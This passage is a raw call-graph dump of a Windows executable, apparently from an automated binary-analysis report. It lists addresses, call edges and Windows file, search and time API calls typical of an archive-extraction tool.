26609->26072 26610->26072 26611->26072 26612->26072 26613->26072 26614->26004 26615->26072 26616->26072 26617->26072 26618->26072 26620 7ff65a3672aa 26619->26620 26671 7ff65a35b3b8 26620->26671 26624 7ff65a3631a7 DeleteFileW 26623->26624 26625 7ff65a3631a4 26623->26625 26626 7ff65a3631bd 26624->26626 26627 7ff65a36323c 26624->26627 26625->26624 26629 7ff65a3669cc 49 API calls 26626->26629 26628 7ff65a3822a0 _handle_error 8 API calls 26627->26628 26630 7ff65a363251 26628->26630 26631 7ff65a3631e2 26629->26631 26630->26072 26632 7ff65a3631e6 DeleteFileW 26631->26632 26633 7ff65a363203 26631->26633 26632->26633 26633->26627 26634 7ff65a363261 26633->26634 26635 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26634->26635 26636 7ff65a363266 26635->26636 26638->26072 26639->26072 26640->26072 26641->26072 26643 7ff65a367dcc 26642->26643 26644 7ff65a367de3 26643->26644 26645 7ff65a367e15 26643->26645 26647 7ff65a35129c 33 API calls 26644->26647 26675 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26645->26675 26649 7ff65a367e07 26647->26649 26648 7ff65a367e1a 26649->26072 26650->26072 26651->26072 26654 7ff65a36d21a 26652->26654 26653 7ff65a36d24d 26653->26064 26654->26653 26655 7ff65a351744 33 API calls 26654->26655 26655->26654 26656->25962 26657->25952 26659->25931 26660->25934 26661->25937 26662->25992 26663->25979 26665->25981 26667->26575 26668->26598 26669->26602 26670->26595 26674 7ff65a35b402 __scrt_get_show_window_mode 26671->26674 26672 7ff65a3822a0 _handle_error 8 API calls 26673 7ff65a35b4c6 26672->26673 26673->26072 26674->26672 26675->26648 26710 7ff65a3686ac 26676->26710 26678 7ff65a35e3d4 26716 7ff65a35e610 31 API calls BuildCatchObjectHelperInternal 26678->26716 26680 7ff65a35e4e4 26681 7ff65a382150 33 API calls 26680->26681 26684 7ff65a35e500 26681->26684 26682 7ff65a35e559 26685 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26682->26685 26683 7ff65a35e464 26683->26680 26683->26682 26717 7ff65a3730c8 102 API calls 26684->26717 26686 7ff65a35e55e 26685->26686 26690 7ff65a36187a 26686->26690 26692 7ff65a351fa0 31 API calls 26686->26692 26693 7ff65a3618c5 26686->26693 26688 7ff65a35e52d 26689 7ff65a3822a0 _handle_error 8 API calls 26688->26689 26691 7ff65a35e53d 26689->26691 26690->26693 26694 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26690->26694 26691->26080 26692->26686 26693->26080 26695 7ff65a3618f3 26694->26695 26697 7ff65a35e7fa 26696->26697 26698 7ff65a35e874 26697->26698 26700 7ff65a35e8b1 26697->26700 26718 7ff65a363e88 26697->26718 26698->26700 26701 7ff65a35e9a3 26698->26701 26707 7ff65a35e910 26700->26707 26725 7ff65a35f588 26700->26725 26702 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26701->26702 26703 7ff65a35e9a8 26702->26703 26705 7ff65a3822a0 _handle_error 8 API calls 26706 7ff65a35e98e 26705->26706 26706->26082 26709 7ff65a35e965 26707->26709 26761 7ff65a3528a4 82 API calls 2 library calls 26707->26761 26709->26705 26711 7ff65a3686ca 26710->26711 26712 7ff65a382150 33 API calls 26711->26712 26713 7ff65a3686ef 26712->26713 26714 7ff65a382150 33 API calls 26713->26714 26715 7ff65a368719 26714->26715 26715->26678 26716->26683 26717->26688 26719 7ff65a36728c 8 API calls 26718->26719 26720 7ff65a363ea1 26719->26720 26721 7ff65a363ecf 26720->26721 26762 7ff65a36407c 26720->26762 26721->26697 26724 7ff65a363eba FindClose 26724->26721 26726 7ff65a35f5a8 _snwprintf 26725->26726 26801 7ff65a352950 26726->26801 26729 7ff65a35f5dc 26733 7ff65a35f60c 26729->26733 26816 7ff65a3533e4 26729->26816 26732 7ff65a35f608 26732->26733 26848 7ff65a353ad8 26732->26848 27064 7ff65a352c54 26733->27064 26740 7ff65a35f7db 26858 7ff65a35f8b4 26740->26858 26742 7ff65a358d04 33 API calls 26743 7ff65a35f672 26742->26743 27084 7ff65a3678d8 48 API calls 2 library calls 26743->27084 26745 7ff65a35f687 26746 7ff65a363e88 55 API calls 26745->26746 26751 7ff65a35f6bd 26746->26751 26748 7ff65a35f852 26748->26733 26879 7ff65a3569f8 26748->26879 26890 7ff65a35f940 26748->26890 26754 7ff65a35f75d 26751->26754 26755 7ff65a35f8aa 26751->26755 26758 7ff65a363e88 55 API calls 26751->26758 27085 7ff65a3678d8 48 API calls 2 library calls 26751->27085 26754->26740 26754->26755 26757 7ff65a35f8a5 26754->26757 26756 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26755->26756 26759 7ff65a35f8b0 26756->26759 26760 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26757->26760 26758->26751 26760->26755 26761->26709 26763 7ff65a3640b9 FindFirstFileW 26762->26763 26764 7ff65a364192 FindNextFileW 26762->26764 26767 7ff65a3640de 26763->26767 26769 7ff65a3641b3 26763->26769 26766 7ff65a3641a1 GetLastError 26764->26766 26764->26769 26787 7ff65a364180 26766->26787 26768 7ff65a3669cc 49 API calls 26767->26768 26772 7ff65a364104 26768->26772 26770 7ff65a3641d1 26769->26770 26773 7ff65a3520b0 33 API calls 26769->26773 26775 7ff65a35129c 33 API calls 26770->26775 26771 7ff65a3822a0 _handle_error 8 API calls 26774 7ff65a363eb4 26771->26774 26776 7ff65a364127 26772->26776 26777 7ff65a364108 FindFirstFileW 26772->26777 26773->26770 26774->26721 26774->26724 26778 7ff65a3641fb 26775->26778 26776->26769 26780 7ff65a36416f GetLastError 26776->26780 26781 7ff65a3642d4 26776->26781 26777->26776 26788 7ff65a368050 26778->26788 26780->26787 26783 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26781->26783 26784 7ff65a3642da 26783->26784 26785 7ff65a3642cf 26786 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26785->26786 26786->26781 26787->26771 26789 7ff65a368065 26788->26789 26792 7ff65a368148 26789->26792 26791 7ff65a364209 26791->26785 26791->26787 26793 7ff65a3682e6 26792->26793 26795 7ff65a36817a 26792->26795 26800 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26793->26800 26798 7ff65a368194 BuildCatchObjectHelperInternal 26795->26798 26799 7ff65a365864 33 API calls 2 library calls 26795->26799 26796 7ff65a3682eb 26798->26791 26799->26798 26800->26796 26802 7ff65a35296c 26801->26802 26803 7ff65a3686ac 33 API calls 26802->26803 26804 7ff65a35298d 26803->26804 26805 7ff65a382150 33 API calls 26804->26805 26808 7ff65a352ac2 26804->26808 26806 7ff65a352ab0 26805->26806 26806->26808 27086 7ff65a3591c8 26806->27086 27093 7ff65a364cc4 26808->27093 26811 7ff65a362c68 27125 7ff65a362480 26811->27125 26813 7ff65a362c85 26813->26729 27144 7ff65a362890 26816->27144 26817 7ff65a353431 __scrt_get_show_window_mode 26827 7ff65a35344e 26817->26827 26829 7ff65a353601 26817->26829 27149 7ff65a362b70 26817->27149 26818 7ff65a353674 27163 7ff65a3528a4 82 API calls 2 library calls 26818->27163 26820 7ff65a3569f8 141 API calls 26822 7ff65a353682 26820->26822 26822->26820 26823 7ff65a35370c 26822->26823 26822->26829 26845 7ff65a362a60 101 API calls 26822->26845 26823->26829 26830 7ff65a353740 26823->26830 27164 7ff65a3528a4 82 API calls 2 library calls 26823->27164 26825 7ff65a3534eb 26826 7ff65a3535cb 26825->26826 27158 7ff65a362a60 26825->27158 26826->26827 26828 7ff65a3535d7 26826->26828 26827->26818 26827->26822 26828->26829 26832 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26828->26832 26829->26732 26830->26829 26831 7ff65a35384d 26830->26831 26843 7ff65a362b70 101 API calls 26830->26843 26831->26829 26833 7ff65a3520b0 33 API calls 26831->26833 26834 7ff65a353891 26832->26834 26833->26829 26834->26732 26836 7ff65a3569f8 141 API calls 26837 7ff65a35378e 26836->26837 26837->26836 26838 7ff65a353803 26837->26838 26846 7ff65a362a60 101 API calls 26837->26846 26841 7ff65a362a60 101 API calls 26838->26841 26841->26831 26842 7ff65a362890 104 API calls 26842->26825 26843->26837 26844 7ff65a362890 104 API calls 26844->26826 26845->26822 26846->26837 26849 7ff65a353af9 26848->26849 26853 7ff65a353b55 26848->26853 27176 7ff65a353378 26849->27176 26850 7ff65a3822a0 _handle_error 8 API calls 26852 7ff65a353b67 26850->26852 26852->26740 26852->26742 26853->26850 26855 7ff65a353b6c 26856 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26855->26856 26857 7ff65a353b71 26856->26857 27406 7ff65a36882c 26858->27406 26860 7ff65a35f8ca 27410 7ff65a36eee0 GetSystemTime SystemTimeToFileTime 26860->27410 26863 7ff65a370914 26864 7ff65a3802c0 26863->26864 26865 7ff65a367db4 47 API calls 26864->26865 26866 7ff65a3802f3 26865->26866 26867 7ff65a36aaa0 48 API calls 26866->26867 26868 7ff65a380307 26867->26868 26869 7ff65a36da14 48 API calls 26868->26869 26870 7ff65a380317 26869->26870 26871 7ff65a351fa0 31 API calls 26870->26871 26872 7ff65a380322 26871->26872 27419 7ff65a37fbe8 26872->27419 26875 7ff65a351fa0 31 API calls 26876 7ff65a380343 26875->26876 26880 7ff65a356a0e 26879->26880 26884 7ff65a356a0a 26879->26884 26889 7ff65a362b70 101 API calls 26880->26889 26881 7ff65a356a1b 26882 7ff65a356a3e 26881->26882 26883 7ff65a356a2f 26881->26883 27514 7ff65a355138 130 API calls 2 library calls 26882->27514 26883->26884 27431 7ff65a355e2c 26883->27431 26884->26748 26887 7ff65a356a3c 26887->26884 27515 7ff65a35466c 82 API calls 26887->27515 26889->26881 26891 7ff65a35f988 26890->26891 26894 7ff65a35f9c0 26891->26894 26948 7ff65a35fa44 26891->26948 27636 7ff65a3760ac 146 API calls 3 library calls 26891->27636 26893 7ff65a361141 26896 7ff65a361146 26893->26896 26897 7ff65a361199 26893->26897 26894->26893 26901 7ff65a35f9e0 26894->26901 26894->26948 26895 7ff65a3822a0 _handle_error 8 API calls 26898 7ff65a36117c 26895->26898 26896->26948 27684 7ff65a35dd18 179 API calls 26896->27684 26897->26948 27685 7ff65a3760ac 146 API calls 3 library calls 26897->27685 26898->26748 26901->26948 27551 7ff65a359bb0 26901->27551 26903 7ff65a35fae6 27564 7ff65a365eb8 26903->27564 26906 7ff65a35fb8a 27063 7ff65a362a60 101 API calls 26906->27063 26908 7ff65a35fb6e 26908->26906 27638 7ff65a367c54 47 API calls 2 library calls 26908->27638 26910 7ff65a35fcda 26911 7ff65a35fd27 26914 7ff65a35fbe7 26914->26910 26914->26911 26919 7ff65a3520b0 33 API calls 26914->26919 26919->26910 26948->26895 27063->26914 27065 7ff65a352c74 27064->27065 27066 7ff65a352c88 27064->27066 27065->27066 27788 7ff65a352d80 108 API calls _invalid_parameter_noinfo_noreturn 27065->27788 27067 7ff65a351fa0 31 API calls 27066->27067 27071 7ff65a352ca1 27067->27071 27070 7ff65a352d08 27773 7ff65a353090 31 API calls _invalid_parameter_noinfo_noreturn 27070->27773 27083 7ff65a352d64 27071->27083 27772 7ff65a353090 31 API calls _invalid_parameter_noinfo_noreturn 27071->27772 27073 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27075 7ff65a352d7c 27073->27075 27074 7ff65a352d14 27076 7ff65a351fa0 31 API calls 27074->27076 27077 7ff65a352d20 27076->27077 27774 7ff65a36874c 27077->27774 27083->27073 27084->26745 27085->26751 27103 7ff65a365664 27086->27103 27088 7ff65a3591df 27106 7ff65a36b744 27088->27106 27092 7ff65a359383 27092->26808 27094 7ff65a364cf2 __scrt_get_show_window_mode 27093->27094 27121 7ff65a364b6c 27094->27121 27096 7ff65a364d14 27097 7ff65a364d50 27096->27097 27099 7ff65a364d6e 27096->27099 27098 7ff65a3822a0 _handle_error 8 API calls 27097->27098 27100 7ff65a352b32 27098->27100 27101 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27099->27101 27100->26729 27100->26811 27102 7ff65a364d73 27101->27102 27112 7ff65a3656a8 27103->27112 27107 7ff65a3513a4 33 API calls 27106->27107 27108 7ff65a359365 27107->27108 27109 7ff65a359a28 27108->27109 27110 7ff65a3656a8 2 API calls 27109->27110 27111 7ff65a359a36 27110->27111 27111->27092 27113 7ff65a3656be __scrt_get_show_window_mode 27112->27113 27116 7ff65a36eb20 27113->27116 27119 7ff65a36ead4 GetCurrentProcess GetProcessAffinityMask 27116->27119 27120 7ff65a36569e 27119->27120 27120->27088 27122 7ff65a364be7 27121->27122 27124 7ff65a364bef BuildCatchObjectHelperInternal 27121->27124 27123 7ff65a351fa0 31 API calls 27122->27123 27123->27124 27124->27096 27126 7ff65a3624bd CreateFileW 27125->27126 27128 7ff65a36256e GetLastError 27126->27128 27138 7ff65a36262e 27126->27138 27129 7ff65a3669cc 49 API calls 27128->27129 27130 7ff65a36259c 27129->27130 27131 7ff65a3625a0 CreateFileW GetLastError 27130->27131 27137 7ff65a3625ec 27130->27137 27131->27137 27132 7ff65a362671 SetFileTime 27136 7ff65a36268f 27132->27136 27133 7ff65a3626c8 27134 7ff65a3822a0 _handle_error 8 API calls 27133->27134 27135 7ff65a3626db 27134->27135 27135->26813 27143 7ff65a35b7f8 99 API calls 2 library calls 27135->27143 27136->27133 27140 7ff65a3520b0 33 API calls 27136->27140 27137->27138 27139 7ff65a3626f6 27137->27139 27138->27132 27138->27136 27141 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27139->27141 27140->27133 27142 7ff65a3626fb 27141->27142 27143->26813 27145 7ff65a3628bd 27144->27145 27146 7ff65a3628b6 27144->27146 27145->27146 27148 7ff65a3622e0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27145->27148 27165 7ff65a35b8b4 99 API calls std::_Xinvalid_argument 27145->27165 27146->26817 27148->27145 27150 7ff65a362b8d 27149->27150 27155 7ff65a362ba9 27149->27155 27151 7ff65a3534cc 27150->27151 27166 7ff65a35b9d4 99 API calls std::_Xinvalid_argument 27150->27166 27151->26842 27153 7ff65a362bc1 SetFilePointer 27153->27151 27154 7ff65a362bde GetLastError 27153->27154 27154->27151 27156 7ff65a362be8 27154->27156 27155->27151 27155->27153 27156->27151 27167 7ff65a35b9d4 99 API calls std::_Xinvalid_argument 27156->27167 27168 7ff65a362738 27158->27168 27161 7ff65a3535a7 27161->26826 27161->26844 27163->26829 27164->26830 27169 7ff65a362749 _snwprintf 27168->27169 27170 7ff65a362850 SetFilePointer 27169->27170 27174 7ff65a362775 27169->27174 27173 7ff65a362878 GetLastError 27170->27173 27170->27174 27171 7ff65a3822a0 _handle_error 8 API calls 27172 7ff65a3627dd 27171->27172 27172->27161 27175 7ff65a35b9d4 99 API calls std::_Xinvalid_argument 27172->27175 27173->27174 27174->27171 27177 7ff65a35339a 27176->27177 27178 7ff65a353396 27176->27178 27182 7ff65a353294 27177->27182 27178->26853 27178->26855 27181 7ff65a362a60 101 API calls 27181->27178 27183 7ff65a3532bb 27182->27183 27185 7ff65a3532f6 27182->27185 27184 7ff65a3569f8 141 API calls 27183->27184 27188 7ff65a3532db 27184->27188 27190 7ff65a356e74 27185->27190 27188->27181 27194 7ff65a356e95 27190->27194 27191 7ff65a3569f8 141 API calls 27191->27194 27192 7ff65a35331d 27192->27188 27195 7ff65a353904 27192->27195 27194->27191 27194->27192 27222 7ff65a36e784 27194->27222 27230 7ff65a356a7c 27195->27230 27198 7ff65a35396a 27201 7ff65a35399a 27198->27201 27202 7ff65a353989 27198->27202 27199 7ff65a353a8a 27203 7ff65a3822a0 _handle_error 8 API calls 27199->27203 27207 7ff65a3539ec 27201->27207 27208 7ff65a3539a3 27201->27208 27262 7ff65a370cd4 27202->27262 27206 7ff65a353a9e 27203->27206 27204 7ff65a353ab3 27210 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27204->27210 27206->27188 27268 7ff65a3526b4 33 API calls BuildCatchObjectHelperInternal 27207->27268 27267 7ff65a370c00 33 API calls 27208->27267 27211 7ff65a353ab8 27210->27211 27215 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27211->27215 27212 7ff65a3539b0 27213 7ff65a3539c0 BuildCatchObjectHelperInternal 27212->27213 27216 7ff65a351fa0 31 API calls 27212->27216 27217 7ff65a351fa0 31 API calls 27213->27217 27219 7ff65a353abe 27215->27219 27216->27213 27221 7ff65a35394f 27217->27221 27218 7ff65a353a13 27269 7ff65a370a68 34 API calls _invalid_parameter_noinfo_noreturn 27218->27269 27221->27199 27221->27204 27221->27211 27223 7ff65a36e78d 27222->27223 27225 7ff65a36e7a7 27223->27225 27228 7ff65a35b674 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27223->27228 27226 7ff65a36e7c1 SetThreadExecutionState 27225->27226 27229 7ff65a35b674 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27225->27229 27228->27225 27229->27226 27231 7ff65a356a96 _snwprintf 27230->27231 27232 7ff65a356ae4 27231->27232 27233 7ff65a356ac4 27231->27233 27234 7ff65a356d4d 27232->27234 27238 7ff65a356b0f 27232->27238 27308 7ff65a3528a4 82 API calls 2 library calls 27233->27308 27337 7ff65a3528a4 82 API calls 2 library calls 27234->27337 27237 7ff65a356ad0 27239 7ff65a3822a0 _handle_error 8 API calls 27237->27239 27238->27237 27270 7ff65a371f14 27238->27270 27240 7ff65a35394b 27239->27240 27240->27198 27240->27221 27266 7ff65a352794 33 API calls __std_swap_ranges_trivially_swappable 27240->27266 27243 7ff65a356b85 27244 7ff65a356c2a 27243->27244 27261 7ff65a356b7b 27243->27261 27314 7ff65a368928 109 API calls 27243->27314 27279 7ff65a364720 27244->27279 27245 7ff65a356b6e 27309 7ff65a3528a4 82 API calls 2 library calls 27245->27309 27246 7ff65a356b80 27246->27243 27310 7ff65a3540b0 27246->27310 27252 7ff65a356c52 27253 7ff65a356cc7 27252->27253 27254 7ff65a356cd1 27252->27254 27283 7ff65a36174c 27253->27283 27315 7ff65a371ea0 27254->27315 27257 7ff65a356ccf 27335 7ff65a3646c0 8 API calls _handle_error 27257->27335 27259 7ff65a356cfd 27259->27261 27336 7ff65a35433c 82 API calls 2 library calls 27259->27336 27298 7ff65a3717f0 27261->27298 27264 7ff65a370d0c 27262->27264 27263 7ff65a370ec8 27263->27221 27264->27263 27265 7ff65a351744 33 API calls 27264->27265 27265->27264 27266->27198 27267->27212 27268->27218 27269->27221 27271 7ff65a371fd6 std::bad_alloc::bad_alloc 27270->27271 27273 7ff65a371f45 std::bad_alloc::bad_alloc 27270->27273 27338 7ff65a383ff8 27271->27338 27274 7ff65a371f8f std::bad_alloc::bad_alloc 27273->27274 27275 7ff65a383ff8 std::_Xinvalid_argument 2 API calls 27273->27275 27276 7ff65a356b59 27273->27276 27274->27276 27277 7ff65a383ff8 std::_Xinvalid_argument 2 API calls 27274->27277 27275->27274 27276->27243 27276->27245 27276->27246 27278 7ff65a372029 27277->27278 27280 7ff65a364740 27279->27280 27282 7ff65a36474a 27279->27282 27281 7ff65a382150 33 API calls 27280->27281 27281->27282 27282->27252 27284 7ff65a361776 __scrt_get_show_window_mode 27283->27284 27343 7ff65a368a08 27284->27343 27286 7ff65a36180e 27286->27257 27287 7ff65a3617aa 27288 7ff65a368a08 151 API calls 27287->27288 27289 7ff65a3617e8 27287->27289 27353 7ff65a368c0c 27287->27353 27288->27287 27289->27286 27291 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27289->27291 27292 7ff65a36183a 27291->27292 27293 7ff65a3618c5 27292->27293 27294 7ff65a351fa0 31 API calls 27292->27294 27295 7ff65a36187a 27292->27295 27293->27257 27294->27292 27295->27293 27299 7ff65a37180e 27298->27299 27301 7ff65a371821 27299->27301 27363 7ff65a36e8c4 27299->27363 27305 7ff65a371858 27301->27305 27359 7ff65a3822ec 27301->27359 27303 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27304 7ff65a371a50 27303->27304 27307 7ff65a3719b7 27305->27307 27370 7ff65a36a944 31 API calls _invalid_parameter_noinfo_noreturn 27305->27370 27307->27303 27308->27237 27309->27261 27311 7ff65a3540dd 27310->27311 27313 7ff65a3540d7 __scrt_get_show_window_mode 27310->27313 27311->27313 27371 7ff65a354120 33 API calls 2 library calls 27311->27371 27313->27243 27314->27244 27316 7ff65a371ea9 27315->27316 27317 7ff65a371edd 27316->27317 27318 7ff65a371ed5 27316->27318 27319 7ff65a371ec9 27316->27319 27317->27257 27402 7ff65a3738e4 156 API calls 27318->27402 27372 7ff65a37202c 27319->27372 27322 7ff65a3746b3 BuildCatchObjectHelperInternal 27322->27322 27323 7ff65a368a08 151 API calls 27322->27323 27324 7ff65a374a57 27322->27324 27376 7ff65a36e958 27322->27376 27382 7ff65a36ec58 27322->27382 27386 7ff65a372320 27322->27386 27403 7ff65a372a30 151 API calls 27322->27403 27404 7ff65a374b18 151 API calls 27322->27404 27405 7ff65a375370 156 API calls 27322->27405 27323->27322 27391 7ff65a373404 27324->27391 27335->27259 27336->27261 27337->27237 27339 7ff65a384017 27338->27339 27340 7ff65a384034 RtlPcToFileHeader 27338->27340 27339->27340 27341 7ff65a38404c 27340->27341 27342 7ff65a38405b RaiseException 27340->27342 27341->27342 27342->27273 27345 7ff65a368b8d 27343->27345 27349 7ff65a368a51 BuildCatchObjectHelperInternal 27343->27349 27344 7ff65a368bda 27346 7ff65a36e784 SetThreadExecutionState RtlPcToFileHeader RaiseException 27344->27346 27345->27344 27347 7ff65a35a174 8 API calls 27345->27347 27350 7ff65a368bdf 27346->27350 27347->27344 27348 7ff65a3760ac 146 API calls 27348->27349 27349->27345 27349->27348 27349->27350 27351 7ff65a364848 108 API calls 27349->27351 27352 7ff65a362890 104 API calls 27349->27352 27350->27287 27351->27349 27352->27349 27354 7ff65a368c4b 27353->27354 27355 7ff65a368c32 BuildCatchObjectHelperInternal 27353->27355 27354->27355 27356 7ff65a362ca0 104 API calls 27354->27356 27357 7ff65a368c79 27355->27357 27358 7ff65a364848 108 API calls 27355->27358 27356->27355 27358->27357 27360 7ff65a38231f 27359->27360 27361 7ff65a382348 27360->27361 27362 7ff65a3717f0 108 API calls 27360->27362 27361->27305 27362->27360 27364 7ff65a36ec58 103 API calls 27363->27364 27365 7ff65a36e8db ReleaseSemaphore 27364->27365 27366 7ff65a36e900 27365->27366 27367 7ff65a36e91f DeleteCriticalSection CloseHandle CloseHandle 27365->27367 27368 7ff65a36e9d8 101 API calls 27366->27368 27369 7ff65a36e90a FindCloseChangeNotification 27368->27369 27369->27366 27369->27367 27370->27307 27374 7ff65a372048 __scrt_get_show_window_mode 27372->27374 27373 7ff65a37213a 27373->27322 27374->27373 27375 7ff65a35b76c 82 API calls 27374->27375 27375->27374 27377 7ff65a36e979 27376->27377 27378 7ff65a36e97e 27376->27378 27379 7ff65a36ea20 101 API calls 27377->27379 27380 7ff65a36e98f 27378->27380 27381 7ff65a36ec58 103 API calls 27378->27381 27379->27378 27380->27322 27381->27380 27383 7ff65a36ec6a ResetEvent ReleaseSemaphore 27382->27383 27384 7ff65a36ec99 27382->27384 27385 7ff65a36e9d8 101 API calls 27383->27385 27384->27322 27385->27384 27387 7ff65a372a0c 27386->27387 27389 7ff65a372359 27386->27389 27387->27322 27388 7ff65a373404 113 API calls 27388->27389 27389->27387 27389->27388 27390 7ff65a371ad4 113 API calls 27389->27390 27390->27389 27402->27317 27403->27322 27404->27322 27405->27322 27407 7ff65a368842 27406->27407 27408 7ff65a368852 27406->27408 27413 7ff65a3623b0 27407->27413 27408->26860 27411 7ff65a3822a0 _handle_error 8 API calls 27410->27411 27412 7ff65a35f7ec 27411->27412 27412->26748 27412->26863 27414 7ff65a3623cf 27413->27414 27417 7ff65a362a60 101 API calls 27414->27417 27415 7ff65a3623e8 27418 7ff65a362b70 101 API calls 27415->27418 27416 7ff65a3623f8 27416->27408 27417->27415 27418->27416 27420 7ff65a37fc14 27419->27420 27421 7ff65a35129c 33 API calls 27420->27421 27422 7ff65a37fc24 27421->27422 27423 7ff65a37f024 24 API calls 27422->27423 27424 7ff65a37fc31 27423->27424 27425 7ff65a37fc6b 27424->27425 27427 7ff65a37fc83 27424->27427 27426 7ff65a3822a0 _handle_error 8 API calls 27425->27426 27428 7ff65a37fc7d 27426->27428 27429 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27427->27429 27428->26875 27430 7ff65a37fc88 27429->27430 27432 7ff65a355e6f 27431->27432 27433 7ff65a355ead 27432->27433 27438 7ff65a355ebf 27432->27438 27462 7ff65a356084 27432->27462 27526 7ff65a3528a4 82 API calls 2 library calls 27433->27526 27436 7ff65a356134 27533 7ff65a356fcc 82 API calls 27436->27533 27438->27436 27439 7ff65a355f4c 27438->27439 27527 7ff65a356f38 33 API calls BuildCatchObjectHelperInternal 27438->27527 27528 7ff65a356d88 82 API calls 27439->27528 27440 7ff65a3569af 27442 7ff65a3822a0 _handle_error 8 API calls 27440->27442 27445 7ff65a3569c3 27442->27445 27444 7ff65a3569e4 27447 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27444->27447 27445->26887 27446 7ff65a356973 27476 7ff65a355eba 27446->27476 27545 7ff65a35466c 82 API calls 27446->27545 27451 7ff65a3569e9 27447->27451 27450 7ff65a35612e 27450->27436 27450->27446 27454 7ff65a3685b0 104 API calls 27450->27454 27453 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27451->27453 27452 7ff65a356034 27456 7ff65a3822ec 108 API calls 27452->27456 27452->27462 27455 7ff65a3569ef 27453->27455 27457 7ff65a3561a4 27454->27457 27459 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27455->27459 27458 7ff65a35606e 27456->27458 27457->27436 27467 7ff65a3561ac 27457->27467 27461 7ff65a3822ec 108 API calls 27458->27461 27460 7ff65a3569f5 27459->27460 27461->27462 27516 7ff65a3685b0 27462->27516 27463 7ff65a356097 27532 7ff65a35433c 82 API calls 2 library calls 27463->27532 27466 7ff65a355f65 27466->27452 27466->27463 27529 7ff65a35433c 82 API calls 2 library calls 27466->27529 27530 7ff65a356d88 82 API calls 27466->27530 27531 7ff65a35a1a0 109 API calls _handle_error 27466->27531 27470 7ff65a35623f 27467->27470 27534 7ff65a35466c 82 API calls 27467->27534 27469 7ff65a3560a1 27471 7ff65a3822ec 108 API calls 27469->27471 27469->27476 27470->27446 27475 7ff65a356266 27470->27475 27473 7ff65a3560f4 27471->27473 27474 7ff65a3822ec 108 API calls 27473->27474 27474->27476 27479 7ff65a3568b7 27475->27479 27480 7ff65a3562ce 27475->27480 27476->27440 27476->27444 27476->27455 27481 7ff65a364cc4 31 API calls 27479->27481 27482 7ff65a356481 27480->27482 27484 7ff65a3562e0 27480->27484 27488 7ff65a3568c6 27481->27488 27538 7ff65a364c34 33 API calls 27482->27538 27484->27476 27485 7ff65a354228 33 API calls 27484->27485 27500 7ff65a35638f 27484->27500 27488->27476 27514->26887 27517 7ff65a3685d4 27516->27517 27519 7ff65a36865a 27516->27519 27518 7ff65a36863c 27517->27518 27521 7ff65a3540b0 33 API calls 27517->27521 27518->27450 27519->27518 27520 7ff65a3540b0 33 API calls 27519->27520 27522 7ff65a368673 27520->27522 27523 7ff65a36860d 27521->27523 27525 7ff65a362890 104 API calls 27522->27525 27546 7ff65a35a174 27523->27546 27525->27518 27526->27476 27528->27466 27529->27466 27530->27466 27531->27466 27532->27469 27533->27476 27547 7ff65a35a185 27546->27547 27548 7ff65a35a19a 27547->27548 27550 7ff65a36aed4 8 API calls 2 library calls 27547->27550 27548->27518 27550->27548 27552 7ff65a359be7 27551->27552 27556 7ff65a359c83 27552->27556 27559 7ff65a359c1b 27552->27559 27560 7ff65a359cae 27552->27560 27686 7ff65a365254 27552->27686 27704 7ff65a36dadc 27552->27704 27553 7ff65a3822a0 _handle_error 8 API calls 27554 7ff65a359c9d 27553->27554 27554->26903 27557 7ff65a351fa0 31 API calls 27556->27557 27557->27559 27559->27553 27561 7ff65a359cbf 27560->27561 27708 7ff65a36d9c4 CompareStringW 27560->27708 27561->27556 27563 7ff65a3520b0 33 API calls 27561->27563 27563->27556 27577 7ff65a365efa 27564->27577 27565 7ff65a36615b 27567 7ff65a3822a0 _handle_error 8 API calls 27565->27567 27566 7ff65a36618e 27712 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 27566->27712 27568 7ff65a35fb39 27567->27568 27568->26906 27637 7ff65a367c54 47 API calls 2 library calls 27568->27637 27570 7ff65a35129c 33 API calls 27572 7ff65a3660e9 27570->27572 27571 7ff65a366194 27573 7ff65a351fa0 31 API calls 27572->27573 27574 7ff65a3660fb BuildCatchObjectHelperInternal 27572->27574 27573->27574 27574->27565 27575 7ff65a366189 27574->27575 27576 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27575->27576 27576->27566 27577->27565 27577->27566 27577->27570 27636->26894 27637->26908 27638->26906 27684->26948 27685->26948 27687 7ff65a365294 27686->27687 27692 7ff65a3652d2 __vcrt_FlsAlloc 27687->27692 27693 7ff65a3652f9 __vcrt_FlsAlloc 27687->27693 27709 7ff65a371374 CompareStringW 27687->27709 27688 7ff65a3822a0 _handle_error 8 API calls 27690 7ff65a3654c3 27688->27690 27690->27552 27692->27693 27694 7ff65a365342 __vcrt_FlsAlloc 27692->27694 27710 7ff65a371374 CompareStringW 27692->27710 27693->27688 27694->27693 27695 7ff65a3653f9 27694->27695 27696 7ff65a35129c 33 API calls 27694->27696 27698 7ff65a3654db 27695->27698 27699 7ff65a365449 27695->27699 27697 7ff65a3653e6 27696->27697 27700 7ff65a36728c 8 API calls 27697->27700 27701 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 